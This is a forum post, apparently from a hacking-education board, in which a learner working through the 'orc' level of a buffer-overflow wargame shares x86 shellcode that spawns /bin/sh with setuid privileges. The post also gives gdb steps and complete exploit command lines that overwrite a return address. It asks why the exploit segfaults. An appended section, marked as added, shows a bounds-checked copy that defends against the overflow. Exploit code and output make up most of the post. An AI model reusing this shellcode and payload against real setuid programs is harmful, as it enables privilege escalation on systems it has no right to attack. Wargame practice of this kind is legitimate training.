http://www.hackerschool.org/HS_Boards/zboard.php?id=bof_fellowship&no=119
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
This is the shellcode I use.
In argv[1]: 44 bytes + the address of argv[2]
In argv[2]: the shellcode. That is how I wrote the attack code.
First, to see the address of argv[2],
I did cp orc ./tmp and
[goblin@localhost tmp]$ gdb -q orc
(gdb) b *main+10
Breakpoint 1 at 0x804850a
(gdb) run "`python -c 'print "a"*44+"\x23\xfc\xff\xbf"'`" "`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`"
Starting program: /home/goblin/tmp/orc "`python -c 'print "a"*44+"\x23\xfc\xff\xbf"'`" "`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`"
Breakpoint 1, 0x804850a in main ()
After that I got argv's address with x/10 $ebp,
went inside argv and got the address of argv[2].
The address was 0xbffffc23.
/home/goblin/tmp/orc "`python -c 'print "a"*44+"\x23\xfc\xff\xbf"'`" "`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`"
That is the completed code.
But then
[goblin@localhost tmp]$ /home/goblin/orc "`python -c 'print "a"*44+"\x23\xfc\xff\xbf"'`" "`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa#?
Segmentation fault
[goblin@localhost tmp]$ /home/goblin/tmp/orc "`python -c 'print "a"*44+"\x23\xfc\xff\xbf"'`" "`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa#?
Segmentation fault (core dumped)
I have no idea what is going wrong;
I've been stuck on this for 3 days with no progress.. it's frustrating.
If anyone knows where it went wrong, I'd be grateful for even a hint.
---
I heard that \xff doesn't go onto the stack properly..
but so far, when solving FTZ, writing an eggshell address containing ff into ret still ran without problems.. so I'm just confused.
Hit : 2861 Date : 2010/05/13 09:46
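Added example, not part of the post above and not the orc challenge's own code: the defensive counterpart of the bug being attacked here, a fixed-size stack buffer filled from argv[1]. The 40-byte buffer size, the function names and the return codes are assumptions (the orc source is not on the page). The checked copy refuses any argument that would not fit, including the terminating NUL, so an over-long argv[1] is rejected before it can reach the saved frame pointer or return address.

```c
#include <stdio.h>
#include <string.h>

/* Constructed example: a fixed-size stack buffer filled from argv[1],
   the pattern the post is attacking. Buffer size is an assumption. */
#define BUF_SIZE 40

/* Copy src into dst only if it fits, terminator included.
   Returns 0 on success, -1 when the input is rejected. */
int copy_arg_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len >= dst_size) {
        return -1;              /* refuse instead of overrunning the frame */
    }
    memcpy(dst, src, len + 1);  /* copy the bytes plus the NUL */
    return 0;
}

/* Places the buffer on the stack and fills it with the checked copy.
   Returns the copied length on success, -1 when the argument is rejected. */
int handle_arg(const char *arg)
{
    char buffer[BUF_SIZE];
    if (copy_arg_checked(buffer, sizeof buffer, arg) != 0) {
        return -1;
    }
    return (int)strlen(buffer);
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <arg>\n", argv[0]);
        return 1;
    }
    int r = handle_arg(argv[1]);
    if (r < 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 2;
    }
    printf("copied %d bytes\n", r);
    return 0;
}
```

The boundary that matters is `len >= dst_size`: a 39-byte argument fits with its terminator, a 40-byte one does not, and the 48-byte argv[1] used in the post is rejected outright rather than overwriting the saved registers.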